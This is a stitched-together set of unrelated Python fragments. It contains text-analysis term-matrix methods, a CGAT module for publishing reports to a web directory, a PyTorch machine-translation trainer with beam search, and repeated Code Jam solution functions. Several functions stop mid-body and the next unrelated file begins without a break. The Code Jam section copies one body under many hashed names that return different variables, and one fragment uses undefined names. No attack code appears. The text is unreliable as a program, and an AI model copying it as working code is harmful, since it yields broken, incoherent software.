def _remove_terms_from_list(self, stoplist):
terms_to_ignore = [term for term
in self._term_idx_store._i2val
if ' ' in term or (self._strict_unigram_definition
and ("'" in term or '’' in term))
or term in stoplist]
return self.remove_terms(terms_to_ignore)
def metadata_in_use(self):
'''
Returns True if metadata values are in term doc matrix.
Returns
-------
bool
'''
return len(self._metadata_idx_store) > 0
def _make_all_positive_data_ones(self, newX):
# type: (sparse_matrix) -> sparse_matrix
return (newX > 0).astype(np.int32)
def get_doc_lengths(self):
'''
Returns a list of document lengths in words
Returns
-------
np.array
'''
idx_to_delete_list = self._build_term_index_list(True, self._get_non_unigrams())
unigram_X, _ = self._get_X_after_delete_terms(idx_to_delete_list)
return unigram_X.sum(axis=1).A1
def remove_terms_by_indices(self, idx_to_delete_list, non_text=False):
'''
Parameters
----------
idx_to_delete_list, list
non_text, bool
Should we remove non text features or just terms?
Returns
-------
TermDocMatrix
'''
new_X, new_idx_store = self._get_X_after_delete_terms(idx_to_delete_list, non_text)
return self._make_new_term_doc_matrix(new_X=self._X if non_text else new_X,
new_mX=new_X if non_text else self._mX,
new_y=None,
new_category_idx_store=None,
new_term_idx_store=self._term_idx_store if non_text else new_idx_store,
new_metadata_idx_store=(new_idx_store if non_text
else self._metadata_idx_store),
new_y_mask=np.ones(new_X.shape[0]).astype(np.bool))
def get_scaled_f_scores_vs_background(self,
scaler_algo=DEFAULT_BACKGROUND_SCALER_ALGO,
beta=DEFAULT_BACKGROUND_BETA):
'''
Parameters
----------
scaler_algo : str
see get_scaled_f_scores, default 'none'
beta : float
default 1.
Returns
-------
pd.DataFrame of scaled_f_score scores compared to background corpus
'''
df = self.get_term_and_background_counts()
df['Scaled f-score'] = ScaledFScore.get_scores_for_category(
df['corpus'], df['background'], scaler_algo, beta
)
return df.sort_values(by='Scaled f-score', ascending=False)
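# Illustrative usage (assumes `corpus` is an instance of this class):
#   >>> df = corpus.get_unigram_corpus().get_scaled_f_scores_vs_background()
#   >>> df.head()
# The returned frame has the columns 'corpus', 'background' and
# 'Scaled f-score', sorted by 'Scaled f-score' in descending order.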
def get_term_doc_mat(self):
'''
Returns sparse matrix representation of term-doc-matrix
Returns
-------
scipy.sparse.csr_matrix
'''
return self._X
def get_term_doc_mat_coo(self):
'''
Returns sparse matrix representation of term-doc-matrix
Returns
-------
scipy.sparse.coo_matrix
'''
return self._X.astype(np.double).tocoo()
def get_metadata_doc_mat(self):
'''
Returns sparse matrix representation of term-doc-matrix
Returns
-------
scipy.sparse.csr_matrix
'''
return self._mX
def term_doc_lists(self):
'''
Returns
-------
dict
'''
doc_ids = self._X.transpose().tolil().rows
terms = self._term_idx_store.values()
return dict(zip(terms, doc_ids))
def apply_ranker(self, term_ranker, use_non_text_features):
'''
Parameters
----------
term_ranker : TermRanker
Returns
-------
pd.Dataframe
'''
'''Local.py - CGAT project specific functions
=============================================
The :mod:`Local` module contains various utility functions for working
on CGAT projects and are very specific to the CGAT directory layout.
.. note::
Methods in this module need to made to work with arbitrary project
layouts.
CGAT project layout
-------------------
The method :func:`isCGAT` checks if the code is executed within the
CGAT systems. The functions :func:`getProjectDirectories`,
:func:`getPipelineName`, :func:`getProjectId`, :func:`getProjectName`
provide information about the pipeline executed and the project context.
Publishing
-----------------
Once built, a report can be published by copying it to the publicly
visible directories on the CGAT systems. At the same time, references
to files on CGAT systems need to be replaced with links through the
public web interface. The functions :func:`getPublishDestinations` and
:func:`publish_report` implement this functionality.
The function :meth:`publish_tracks` builds a UCSC track hub and
moves it into the appropriate CGAT download directories.
Reference
---------
'''
import os
import re
import shutil
import inspect
import collections
import brewer2mpl
from CGATCore import Experiment as E
import CGATCore.IOTools as IOTools
from CGATCore.Pipeline.Parameters import loadParameters
PROJECT_ROOT = '/ifs/projects'
# Variables PARAMS and CONFIG will be set by Pipeline.py
# on import.
PARAMS = None
CONFIG = None
def isCGAT(curdir=None):
'''return True if this is a CGAT project.
This method works by checking if the current working directory
is part of :var:`PROJECT_ROOT`.
'''
if curdir is None:
curdir = os.path.abspath(os.getcwd())
return curdir.startswith(PROJECT_ROOT)
def getProjectDirectories(sections=None):
'''return directories relevant to this project.
The entries of the dictionary are:
webdir
Directory for publishing information (without password access).
exportdir
Directory for storing files to be exported alongside
the report.
notebookdir
Directory where project notebooks are located.
Arguments
---------
sections : list
If given, only the named sections are returned.
Returns
-------
directories : dict
Raises
------
ValueError
If any of the directories does not exist
'''
if not isCGAT():
raise ValueError(
"getProjectDirectories called for a non-CGAT project")
project_name = getProjectName()
result = {
'webdir': os.path.join(
PROJECT_ROOT, PARAMS["web_dir"]),
'exportdir': os.path.join(
PARAMS["exportdir"]),
'notebookdir': os.path.join(
PROJECT_ROOT, project_name, "notebooks")
}
if sections:
result = dict([(x, y) for x, y in list(result.items())
if x in sections])
for x, y in list(result.items()):
if not os.path.exists(y):
raise ValueError(
"directory %s for %s does not exist" % (y, x))
return result
def getPipelineName():
'''return the name of the pipeline.
The name of the pipeline is deduced by the name of the top-level
python script. The pipeline name is the name of the script
without any path information and the ``.py`` suffix.
Returns
-------
string
'''
# use the file attribute of the caller
for x in inspect.stack():
if x[0].f_globals["__name__"] == "__main__":
return os.path.basename(x[0].f_globals['__file__'])[:-3]
def getProjectId():
'''get the (obfuscated) project id based on the current working
directory.
The project is located by finding the ``web_dir`` configuration
variable and working backwards from that. ``web_dir`` should be a
link to the web directory in the project directory which then
links to the web directory in the sftp directory which then links
to the obfuscated directory::
pipeline:web_dir
-> /ifs/projects/.../web
-> /ifs/sftp/.../web
-> /ifs/sftp/.../aoeuCATAa (obfuscated directory)
Returns
-------
string
'''
# return an id that has been explicitly set
if "report_project_url" in PARAMS:
return PARAMS["report_project_url"]
curdir = os.path.abspath(os.getcwd())
if not isCGAT(curdir):
raise ValueError(
"method getProjectId not called within %s" % PROJECT_ROOT)
webdir = PARAMS['web_dir']
if not os.path.islink(webdir):
raise ValueError(
"unknown configuration: webdir '%s' is not a link" % webdir)
target = os.readlink(webdir)
if not os.path.islink(target):
raise ValueError(
"unknown configuration: target '%s' is not a link" % target)
return os.path.basename(os.readlink(target))
def getProjectName():
'''cgat specific method: get the name of the project
based on the current working directory.
If called outside the Project hierarchy, the project name
will be set to the name of the current directory.
'''
curdir = os.path.abspath(os.getcwd())
if isCGAT(curdir):
prefixes = len(PROJECT_ROOT.split("/"))
return curdir.split("/")[prefixes]
else:
return os.path.basename(curdir)
def getPublishDestinations(prefix="", suffix=None):
"""cgat specific method : return path names of directories
for publishing.
Arguments
---------
prefix : string
Prefix to add to output directories.
suffix : string
Suffix to add to output directories.
Returns
-------
dest_report : string
Path for report to export
dest_export : string
Path for files to export
"""
if not prefix:
prefix = PARAMS.get("report_prefix", "default")
if prefix == "default":
prefix = getPipelineName() + "_"
if not suffix:
suffix = PARAMS.get("report_suffix", "")
dest_report = prefix + "report"
dest_export = prefix + "export"
if suffix is not None:
dest_report += suffix
dest_export += suffix
return dest_report, dest_export
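# Worked example (illustrative): for a pipeline script named
# pipeline_intervals.py, with report_prefix set to "default" and no
# report_suffix configured, this returns
#   ('pipeline_intervals_report', 'pipeline_intervals_export')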
def publish_report(prefix="",
patterns=[],
project_id=None,
prefix_project="/ifs/projects",
export_files=None,
suffix=None,
subdirs=False,
):
'''publish report into web directory.
Links export directory into web directory.
Copies html pages and fudges links to the pages in the
export directory.
If *prefix* is given, the directories will start with prefix,
otherwise, it is looked up from the option ``report_prefix``.
If report_prefix is "default", the prefix will be derived
from the pipeline name. For example, pipeline_intervals will
be copied to ``pipeline_intervals_report``.
*patterns* is an optional list of two-element tuples (<pattern>,
replacement_string). Each substitution will be applied to each
file ending in .html.
If *project_id* is not given, it will be looked up. This requires
that this method is called within a subdirectory of PROJECT_ROOT.
*export_files* is a dictionary of files to be exported. The key
of the dictionary denotes the target directory within the web
directory. The values in the dictionary are the files to be
linked to in that directory. For example::
exportfiles = {
"bamfiles" : glob.glob( "*/*.bam" ) + glob.glob( "*/*.bam.bai" ),
"bigwigfiles" : glob.glob( "*/*.bw" ),
}
.. note::
This function is CGAT specific.
'''
dest_report, dest_export = getPublishDestinations(prefix, suffix)
web_dir = PARAMS["web_dir"]
if project_id is None:
project_id = getProjectId()
src_export = os.path.abspath("export")
curdir = os.path.abspath(os.getcwd())
# substitute links to export and report
base_url = "http://www.cgat.org/downloads/%s" % project_id
_patterns = [
# redirect export directory
(re.compile(src_export),
"%(base_url)s/%(dest_export)s" % locals()),
# redirect report directory
(re.compile(curdir),
"%(base_url)s/%(dest_report)s" % locals()),
(re.compile('(%s)/_static' %
curdir),
"%(base_url)s/%(dest_report)s/_static" % locals())]
_patterns.extend(patterns)
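# Illustrative rewrite (placeholder paths): with project_id 'aoeuCATAa' and
# dest_export 'pipeline_intervals_export', a link to
#   <curdir>/export/peaks.bed.gz
# in an html page becomes
#   http://www.cgat.org/downloads/aoeuCATAa/pipeline_intervals_export/peaks.bed.gz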
# add intersphinx mapping - this requires that the name
# for the intersphinx redirection (key) corresponds to the
# export location with an appended "_report".
if CONFIG.has_section("intersphinx"):
for key, value in CONFIG.items("intersphinx"):
_patterns.append((
re.compile(os.path.abspath(value)),
"%(base_url)s/%(key)s_report" % locals()))
# check if the target exists in download location
intersphinx_target = os.path.join(
web_dir, key + "_report", "objects.inv")
if not os.path.exists(intersphinx_target):
E.warn("intersphinx mapping for '%s' does not exist at %s" %
(key, intersphinx_target))
def _link(src, dest):
'''create links.
Only link to existing targets.
'''
if os.path.exists(dest):
os.remove(dest)
if not os.path.exists(src):
E.warn("%s does not exist - skipped" % src)
return
# IMS: check if base path of dest exists. This allows for
# prefix to be a nested path structure e.g. project_id/
if not os.path.exists(os.path.dirname(os.path.abspath(dest))):
E.info('creating directory %s' %
os.path.dirname(os.path.abspath(dest)))
os.mkdir(os.path.dirname(os.path.abspath(dest)))
os.symlink(os.path.abspath(src), dest)
def _copy(src, dest):
if os.path.exists(dest):
shutil.rmtree(dest)
if not os.path.exists(src):
E.warn("%s does not exist - skipped" % src)
return
shutil.copytree(os.path.abspath(src), dest)
# publish export dir via symlinking
E.info("linking export directory in %s" % dest_export)
_link(src_export,
os.path.abspath(os.path.join(web_dir, dest_export)))
# publish web pages by copying
E.info("publishing web pages in %s" %
os.path.abspath(os.path.join(web_dir, dest_report)))
_copy(os.path.abspath("report/html"),
os.path.abspath(os.path.join(web_dir, dest_report)))
for root, dirs, files in os.walk(os.path.join(web_dir, dest_report)):
for f in files:
fn = os.path.join(root, f)
if fn.endswith(".html"):
with open(fn) as inf:
data = inf.read()
for rx, repl in _patterns:
data = rx.sub(repl, data)
outf = open(fn, "w")
outf.write(data)
outf.close()
if export_files:
bigwigs, bams, beds = [], [], []
for targetdir, filenames in list(export_files.items()):
targetdir = os.path.join(web_dir, targetdir)
if not os.path.exists(targetdir):
os.makedirs(targetdir)
for src in filenames:
dest = os.path.join(targetdir, os.path.basename(src))
if dest.endswith(".bam"):
bams.append((targetdir, dest))
elif dest.endswith(".bw"):
bigwigs.append((targetdir, dest))
elif dest.endswith(".bed.gz"):
beds.append((targetdir, dest))
dest = os.path.abspath(dest)
if not os.path.exists(dest):
try:
os.symlink(os.path.abspath(src), dest)
except OSError as msg:
E.warn("could not create symlink from %s to %s: %s" %
(os.path.abspath(src), dest, msg))
# output ucsc links
with open("urls.txt", "w") as outfile:
for targetdir, fn in bams:
filename = os.path.basename(fn)
track = filename[:-len(".bam")]
outfile.write(
"""track type=bam name="%(track)s" bigDataUrl=http://www.cgat.org/downloads/%(project_id)s/%(targetdir)s/%(filename)s\n""" % locals())
for targetdir, fn in bigwigs:
filename = os.path.basename(fn)
track = filename[:-len(".bw")]
outfile.write(
"""track type=bigWig name="%(track)s" bigDataUrl=http://www.cgat.org/downloads/%(project_id)s/%(targetdir)s/%(filename)s\n""" % locals())
for targetdir, fn in beds:
filename = os.path.basename(fn)
track = filename[:-len(".bed.gz")]
outfile.write(
"""http://www.cgat.org/downloads/%(project_id)s/%(targetdir)s/%(filename)s\n""" % locals())
E.info("UCSC urls are in urls.txt")
E.info(
"report has been published at http://www.cgat.org/downloads/%(project_id)s/%(dest_report)s" % locals())
def publish_tracks(export_files,
prefix="",
project_id=None,
project_name=None,
UCSC_ini=None):
# Repository: dksifoua/NMT, file: nmt/train/trainer.py
import os
import tqdm
import numpy as np
import matplotlib.pyplot as plt
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torchtext.data import Dataset, Field
from torchtext.data.metrics import bleu_score
from torchtext.data.iterator import BucketIterator
from nmt.config.global_config import GlobalConfig
from nmt.config.train_config import TrainConfig
from nmt.train.train_utils import accuracy, adjust_lr, adjust_tf, AverageMeter, clip_gradient, load, save
from nmt.train.optim_utils import LRFinder
from nmt.train.beam_utils import find_best_path, Node
from nmt.utils.logger import Logger
from typing import Optional
class Trainer:
"""
Training routines.
Args:
model: nn.Module
The wrapped model.
optimizer: Optional[optim.Optimizer]
The wrapped optimizer. Can be None for evaluation and inference phases.
criterion: Optional[nn.Module]
The wrapped loss function. Can be None for evaluation and inference phases.
train_data: Dataset
Train dataset.
valid_data: Dataset
Valid dataset.
test_data: Dataset
Test dataset.
"""
def __init__(self, model: nn.Module, optimizer: Optional[optim.Optimizer], criterion: Optional[nn.Module], src_field: Field,
dest_field: Field, train_data: Dataset, valid_data: Dataset, test_data: Dataset, logger: Logger):
self.model = model
self.optimizer = optimizer
self.criterion = criterion
self.src_field = src_field
self.dest_field = dest_field
self.train_data = train_data
self.valid_data = valid_data
self.test_data = test_data
self.logger = logger
self.train_iterator = None
self.valid_iterator = None
self.test_iterator = None
def build_data_iterator(self, batch_size: int, device: torch.device):
"""
Build data iterators for the training.
Args:
batch_size (int): the batch size.
device (torch.device): the device on which the training will process.
"""
self.train_iterator, self.valid_iterator, self.test_iterator = BucketIterator.splits(
(self.train_data, self.valid_data, self.test_data),
batch_size=batch_size,
sort_key=lambda x: len(x.src),
sort_within_batch=True,
device=device
)
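# Illustrative usage (hypothetical values; `trainer` is an instance of this class):
#   trainer.build_data_iterator(
#       batch_size=64,
#       device=torch.device('cuda' if torch.cuda.is_available() else 'cpu'))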
def lr_finder(self, model_name: str):
"""
Find the best learning rate for training process.
Args:
model_name:
The class name of the model.
"""
lr_finder = LRFinder(model=self.model, optimizer=self.optimizer, criterion=self.criterion, logger=self.logger,
grad_clip=TrainConfig.GRAD_CLIP)
lr_finder.range_test(data_loader=self.train_iterator, end_lr=TrainConfig.END_LR, n_iters=TrainConfig.N_ITERS)
fig = plt.figure(figsize=(15, 5))
ax = fig.add_subplot(1, 1, 1)
ax, lr = lr_finder.plot(ax=ax)
plt.savefig(os.path.join(GlobalConfig.IMG_PATH, f'SuggestedLR_{model_name}.png'))
plt.show()
if lr is not None: # Create an optimizer with the suggested LR
self.optimizer = optim.RMSprop(params=self.model.parameters(), lr=lr)
def load_model_optimizer_weights(self):
last_improvement = 0
if f'Best_{self.model.__class__.__name__}.pth' in os.listdir(GlobalConfig.CHECKPOINT_PATH):
model_state_dict, optim_state_dict, last_improvement = load(self.model.__class__.__name__)
self.model.load_state_dict(model_state_dict)
if self.optimizer is not None:
self.optimizer.load_state_dict(optim_state_dict)
self.logger.info('The model is loaded!')
return last_improvement
def train_step(self, epoch: int, grad_clip: float, tf_ratio: float):
"""
Train the model on a batch.
Args:
epoch (int): the epoch number.
grad_clip (float): the value beyond which we clip gradients in order to avoid exploding gradients.
tf_ratio (float): the teacher forcing ratio. Must be in [0, 1.0]
Returns:
loss (float): the training loss.
acc (float): the training top-5 accuracy.
"""
loss_tracker, acc_tracker = AverageMeter(), AverageMeter()
self.model.train()
progress_bar = tqdm.tqdm(enumerate(self.train_iterator), total=len(self.train_iterator))
for i, data in progress_bar:
# Forward prop.
logits, sorted_dest_sequences, sorted_decode_lengths, sorted_indices = self.model(*data.src, *data.dest,
tf_ratio=tf_ratio)
# Since we decoded starting with <sos>, the targets are all words after <sos>, up to <eos>
sorted_dest_sequences = sorted_dest_sequences[1:, :]
# Remove paddings
logits = nn.utils.rnn.pack_padded_sequence(logits, sorted_decode_lengths).data
sorted_dest_sequences = nn.utils.rnn.pack_padded_sequence(sorted_dest_sequences, sorted_decode_lengths).data
# Calculate loss
loss = self.criterion(logits, sorted_dest_sequences)
# Back prop.
self.optimizer.zero_grad()
loss.backward()
# Clip gradients
if grad_clip is not None:
clip_gradient(self.optimizer, grad_clip)
# Update weights
self.optimizer.step()
# Track metrics
loss_tracker.update(loss.item(), sum(sorted_decode_lengths))
acc_tracker.update(accuracy(logits, sorted_dest_sequences, top_k=5), sum(sorted_decode_lengths))
# Update progressbar description
progress_bar.set_description(
f'Epoch: {epoch + 1:03d} - loss: {loss_tracker.average:.3f} - acc: {acc_tracker.average:.3f}%')
return loss_tracker.average, acc_tracker.average
def validate(self, epoch: int):
"""
Validate the model on a batch.
Args:
epoch: int
The epoch number.
Returns:
loss: float
The validation loss.
acc: float
The validation top-5 accuracy.
bleu-4: float
The validation BLEU score.
"""
references, hypotheses = [], []
loss_tracker, acc_tracker = AverageMeter(), AverageMeter()
self.model.eval()
with torch.no_grad():
progress_bar = tqdm.tqdm(enumerate(self.valid_iterator), total=len(self.valid_iterator))
for i, data in progress_bar:
# Forward prop.
logits, sorted_dest_sequences, sorted_decode_lengths, sorted_indices = self.model(*data.src, *data.dest,
tf_ratio=0.)
# Since we decoded starting with <sos>, the targets are all words after <sos>, up to <eos>
sorted_dest_sequences = sorted_dest_sequences[1:, :]
# Remove paddings
logits_copy = logits.clone()
logits = nn.utils.rnn.pack_padded_sequence(logits, sorted_decode_lengths).data
sorted_dest_sequences = nn.utils.rnn.pack_padded_sequence(sorted_dest_sequences,
sorted_decode_lengths).data
# Calculate loss
loss = self.criterion(logits, sorted_dest_sequences)
# Track metrics
loss_tracker.update(loss.item(), sum(sorted_decode_lengths))
acc_tracker.update(accuracy(logits, sorted_dest_sequences, top_k=5), sum(sorted_decode_lengths))
# Update references
target_sequences = data.dest[0].t()[sorted_indices]
for j in range(target_sequences.size(0)):
target_sequence = target_sequences[j].tolist()
reference = [self.dest_field.vocab.itos[indice] for indice in target_sequence if indice not in (
self.dest_field.vocab.stoi[self.dest_field.init_token],
self.dest_field.vocab.stoi[self.dest_field.pad_token]
)]
references.append([reference])
# Update hypotheses
_, predictions = torch.max(logits_copy, dim=2)
predictions = predictions.t().tolist()
for j, p in enumerate(predictions):
hypotheses.append([self.dest_field.vocab.itos[indice]
for indice in predictions[j][:sorted_decode_lengths[j]] # Remove padding
if indice not in (
self.dest_field.vocab.stoi[self.dest_field.init_token],
self.dest_field.vocab.stoi[self.dest_field.pad_token]
)])
assert len(references) == len(hypotheses)
# Update progressbar description
progress_bar.set_description(
f'Epoch: {epoch + 1:03d} - val_loss: {loss_tracker.average:.3f}'
f' - val_acc: {acc_tracker.average:.3f}%')
# Calculate BLEU-4 score
bleu4 = bleu_score(hypotheses, references, max_n=4, weights=[0.25, 0.25, 0.25, 0.25])
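# With max_n=4 and uniform 0.25 weights this is standard corpus-level BLEU-4,
# i.e. the geometric mean of the 1- to 4-gram precisions (with brevity penalty).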
# Display some examples
for i in np.random.choice(len(self.valid_iterator), size=3, replace=False):
src, dest = ' '.join(references[i][0]), ' '.join(hypotheses[i])
self.logger.info(f'Ground truth translation: {src}')
self.logger.info(f'Predicted translation: {dest}')
self.logger.info('=' * 100)
return loss_tracker.average, acc_tracker.average, bleu4
def train(self, n_epochs: int, grad_clip: float, tf_ratio: float):
"""
Train the model.
Args:
n_epochs: int
grad_clip: float
tf_ratio: float
Returns:
history: Dict[str, List[float]]
"""
last_improvement = self.load_model_optimizer_weights()
history, best_bleu = {'acc': [], 'loss': [], 'val_acc': [], 'val_loss': [], 'bleu4': []}, 0.
for epoch in range(n_epochs):
if last_improvement == 4: # Stop training if there has been no improvement in the last 4 epochs
self.logger.info('Training finished - the model has not improved in the last 4 epochs')
break
if last_improvement > 0: # Decay LR if no improvement
adjust_lr(optimizer=self.optimizer, shrink_factor=0.9, verbose=True, logger=self.logger)
loss, acc = self.train_step(epoch=epoch, grad_clip=grad_clip, tf_ratio=tf_ratio) # Train step
val_loss, val_acc, bleu4 = self.validate(epoch=epoch) # Validation step
# Update history dict
history['acc'].append(acc)
history['loss'].append(loss)
history['val_acc'].append(val_acc)
history['val_loss'].append(val_loss)
history['bleu4'].append(bleu4)
# Print BLEU score
text = f'BLEU-4: {bleu4 * 100:.3f}%'
if bleu4 > best_bleu:
best_bleu, last_improvement = bleu4, 0
else:
last_improvement += 1
text += f' - No improvement for {last_improvement} epoch(s)'
self.logger.info(text)
# Decrease teacher forcing rate
tf_ratio = adjust_tf(tf_ratio=tf_ratio, shrink_factor=0.8, verbose=False)
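# Illustrative decay (assuming adjust_tf simply multiplies by shrink_factor):
# a starting tf_ratio of 1.0 becomes 0.8, 0.64, 0.512, ... over successive epochs.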
# Checkpoint
save(model=self.model, optimizer=self.optimizer, last_improvement=last_improvement, bleu4=bleu4,
is_best=bleu4 >= best_bleu)
return history
def evaluate(self, dataset_name: str, beam_size: int, max_len: int, device: torch.device):
"""
Evaluate the model on the test data
Args:
beam_size: int
dataset_name: str
The dataset on which we evaluate the model. Can be valid or test.
max_len: int
device: torch.device
Returns:
hypotheses: List[str]
references: List[str]
sources: List[str]
bleu4: float
pred_logps: List[float]
attention_weights: List[np.array]
"""
if dataset_name not in ['valid', 'test']:
raise ValueError(f"dataset_name must be 'valid' or 'test', got {dataset_name!r}")
_ = self.load_model_optimizer_weights()
# TODO
# Use dataset instead of iterator
attention = 'Attention' in self.model.__class__.__name__
references, hypotheses, sources, pred_logps, attention_weights = [], [], [], [], []
self.model.eval()
with torch.no_grad():
iterator = getattr(self, f'{dataset_name}_iterator')
progress_bar = tqdm.tqdm(enumerate(iterator), total=len(iterator))
for i, data in progress_bar:
src_sequences, src_lengths = data.src[0], data.src[1]
dest_sequences, dest_lengths = data.dest[0], data.dest[1]
batch_size = src_sequences.shape[1]
for j in range(batch_size): # We evaluate sentence by sentence
src_sequence = src_sequences[:, j].unsqueeze(1) # [seq_len, 1]
dest_sequence = dest_sequences[:, j].unsqueeze(1) # [seq_len, 1]
src_length, dest_length = src_lengths[j, None], dest_lengths[j, None] # [1,]
# Encoding
enc_outputs, (h_state, c_state) = self.model.encoder(input_sequences=src_sequence,
sequence_lengths=src_length)
# Decoding
if attention:
mask = self.model.create_mask(src_sequence) # [seq_len, 1]
tree = [[Node(
token=torch.LongTensor([self.dest_field.vocab.stoi[self.dest_field.init_token]]).to(device),
states=(h_state, c_state, None)
)]]
for _ in range(max_len):
next_nodes = []
for node in tree[-1]:
if node.eos: # Skip eos token
continue
# Decode
if attention:
logit, (h_state, c_state, step_attention) = self.model.decoder(
input_word_index=node.token,
h_state=node.states[0].contiguous(),
c_state=node.states[1].contiguous(),
enc_outputs=enc_outputs,
mask=mask
)
else:
logit, (h_state, c_state) = self.model.decoder(input_word_index=node.token,
h_state=node.states[0].contiguous(),
c_state=node.states[1].contiguous())
# logit: [1, vocab_size]
# h_state: [n_layers, 1, hidden_size]
# c_state: [n_layers, 1, hidden_size]
# Get scores
logp = F.log_softmax(logit, dim=1).squeeze(dim=0) # [vocab_size]
# Get top k tokens & logps
topk_logps, topk_tokens = torch.topk(logp, beam_size)
for k in range(beam_size):
next_nodes.append(Node(
token=topk_tokens[k, None], states=(
h_state, c_state, step_attention if attention else None),
logp=topk_logps[k, None].cpu().item(), parent=node,
eos=topk_tokens[k].cpu().item() == self.dest_field.vocab[self.dest_field.eos_token]
))
if len(next_nodes) == 0:
break
# Sort next_nodes to get the best
next_nodes = sorted(next_nodes, key=lambda _node: _node.logps, reverse=True)
# Update the tree
tree.append(next_nodes[:beam_size])
# Find the best path of the tree
best_path = find_best_path(tree)
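# `tree` is a list of levels: level k holds the (at most beam_size) best
# partial hypotheses of length k. find_best_path (defined in nmt.train.beam_utils,
# not shown here) presumably follows parent links back from the highest-scoring
# leaf, so the path comes out end-to-start; hence the reversal below.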
# Get the translation
pred_translated = [*map(lambda _node: self.dest_field.vocab.itos[_node.token], best_path)]
pred_translated = [*filter(lambda word: word not in [
self.dest_field.init_token, self.dest_field.eos_token
], pred_translated[::-1])]
# Update hypotheses
hypotheses.append(pred_translated)
# Update pred logps
pred_logps.append(sum([*map(lambda _node: _node.logps, best_path)]))
# Update attention weights
if attention:
attention_weights.append(
torch.cat([*map(lambda _node: _node.states[-1], best_path)], dim=1).cpu().detach().numpy()
)
# Update references
references.append([[
self.dest_field.vocab.itos[indice]
for indice in dest_sequence
if indice not in (
self.dest_field.vocab.stoi[self.dest_field.init_token],
self.dest_field.vocab.stoi[self.dest_field.eos_token],
self.dest_field.vocab.stoi[self.dest_field.pad_token]
)
]])
# Update sources
sources.append([
self.src_field.vocab.itos[indice]
for indice in src_sequence
if indice not in (
self.src_field.vocab.stoi[self.src_field.init_token],
self.src_field.vocab.stoi[self.src_field.eos_token],
self.src_field.vocab.stoi[self.src_field.pad_token]
)
])
# Calculate BLEU-4 score
bleu4 = bleu_score(hypotheses, references, max_n=4, weights=[0.25, 0.25, 0.25, 0.25])
r, s = line(infile)
A = [((i * p + q) % r + s) for i in xrange(N)]
total = sum(A)
totalsum = [a for a in A]
for i in xrange(1, N):
totalsum[i] += totalsum[i - 1]
best = total
b = 0
for a in xrange(N):
if b < a:
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a,
b + 1, total, totalsum):
b += 1
best = min(best, getsum(a, b, total, totalsum))
best = total - best
print >> stderr, 'Case #%d' % T
print 'Case #%d: %.10f' % (T, 1.0 * best / total)
if b < a:
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a, b + 1,
total, totalsum):
b += 1
infile.close()
return infile
def func_c4b455e670464f0abb57a45a200956ec():
infile = open('codejam/test_files/Y14R5P1/A.in')
T, = line(infile)
for T in xrange(1, T + 1):
N, p, q, r, s = line(infile)
A = [((i * p + q) % r + s) for i in xrange(N)]
total = sum(A)
totalsum = [a for a in A]
for i in xrange(1, N):
totalsum[i] += totalsum[i - 1]
best = total
b = 0
for a in xrange(N):
if b < a:
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a,
b + 1, total, totalsum):
b += 1
best = min(best, getsum(a, b, total, totalsum))
best = total - best
print >> stderr, 'Case #%d' % T
print 'Case #%d: %.10f' % (T, 1.0 * best / total)
if b < a:
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a, b + 1,
total, totalsum):
b += 1
infile.close()
return r
def func_424728ccf8bf444ebac61c68c76f4d3f():
infile = open('codejam/test_files/Y14R5P1/A.in')
T, = line(infile)
for T in xrange(1, T + 1):
N, p, q, r, s = line(infile)
A = [((i * p + q) % r + s) for i in xrange(N)]
total = sum(A)
totalsum = [a for a in A]
for i in xrange(1, N):
totalsum[i] += totalsum[i - 1]
best = total
b = 0
for a in xrange(N):
if b < a:
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a,
b + 1, total, totalsum):
b += 1
best = min(best, getsum(a, b, total, totalsum))
best = total - best
print >> stderr, 'Case #%d' % T
print 'Case #%d: %.10f' % (T, 1.0 * best / total)
if b < a:
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a, b + 1,
total, totalsum):
b += 1
infile.close()
return b
def func_b2fbcb34b7bc404195a6d2b707095403():
infile = open('codejam/test_files/Y14R5P1/A.in')
T, = line(infile)
for T in xrange(1, T + 1):
N, p, q, r, s = line(infile)
A = [((i * p + q) % r + s) for i in xrange(N)]
total = sum(A)
totalsum = [a for a in A]
for i in xrange(1, N):
totalsum[i] += totalsum[i - 1]
best = total
b = 0
for a in xrange(N):
if b < a:
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a,
b + 1, total, totalsum):
b += 1
best = min(best, getsum(a, b, total, totalsum))
best = total - best
print >> stderr, 'Case #%d' % T
print 'Case #%d: %.10f' % (T, 1.0 * best / total)
if b < a:
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a, b + 1,
total, totalsum):
b += 1
infile.close()
return A
def func_9c2399ce63344af09045aa205c8e5ec3():
infile = open('codejam/test_files/Y14R5P1/A.in')
T, = line(infile)
for T in xrange(1, T + 1):
N, p, q, r, s = line(infile)
A = [((i * p + q) % r + s) for i in xrange(N)]
total = sum(A)
totalsum = [a for a in A]
for i in xrange(1, N):
totalsum[i] += totalsum[i - 1]
best = total
b = 0
for a in xrange(N):
if b < a:
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a,
b + 1, total, totalsum):
b += 1
best = min(best, getsum(a, b, total, totalsum))
best = total - best
print >> stderr, 'Case #%d' % T
print 'Case #%d: %.10f' % (T, 1.0 * best / total)
if b < a:
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a, b + 1,
total, totalsum):
b += 1
infile.close()
return T
def func_0baf7a2224154215ad97b22e7a041b21():
infile = open('codejam/test_files/Y14R5P1/A.in')
T, = line(infile)
for T in xrange(1, T + 1):
N, p, q, r, s = line(infile)
A = [((i * p + q) % r + s) for i in xrange(N)]
total = sum(A)
totalsum = [a for a in A]
for i in xrange(1, N):
totalsum[i] += totalsum[i - 1]
best = total
b = 0
for a in xrange(N):
if b < a:
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a,
b + 1, total, totalsum):
b += 1
best = min(best, getsum(a, b, total, totalsum))
best = total - best
print >> stderr, 'Case #%d' % T
print 'Case #%d: %.10f' % (T, 1.0 * best / total)
if b < a:
b += 1
while b < N - 1 and getsum(a, b, total, totalsum) >= getsum(a, b + 1,
total, totalsum):
b += 1
infile.close()
return best
def func_d1a5f32b7cd240c0b383329cd5fc9faa():
infile = open('codejam/test_files/Y14R5P1/A.in')
